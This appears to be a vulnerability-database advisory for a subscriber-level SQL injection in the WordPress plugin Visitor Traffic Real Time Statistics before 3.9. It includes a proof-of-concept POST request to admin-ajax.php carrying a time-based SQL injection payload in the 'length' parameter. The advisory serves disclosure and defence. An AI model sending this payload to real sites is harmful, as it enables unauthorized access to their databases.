Lucene search

K
wpexploitJrXnmWPEX-ID:CC6585C8-5798-48A1-89F7-A3337F56DF3F
HistoryOct 06, 2021 - 12:00 a.m.

Visitor Traffic Real Time Statistics < 3.9 - Subscriber+ SQL Injection

2021-10-0600:00:00
JrXnm
354

0.001 Low

EPSS

Percentile

37.7%

The plugin does not validate and escape user input passed to the today_traffic_index AJAX action (available to any authenticated users) before using it in a SQL statement, leading to an SQL injection issue

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 129
Connection: close
Cookie: [subscriber+]

action=today_traffic_index&start=0&length=1+procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(30000000,sha1(1))),0x20),1);

0.001 Low

EPSS

Percentile

37.7%

Related for WPEX-ID:CC6585C8-5798-48A1-89F7-A3337F56DF3F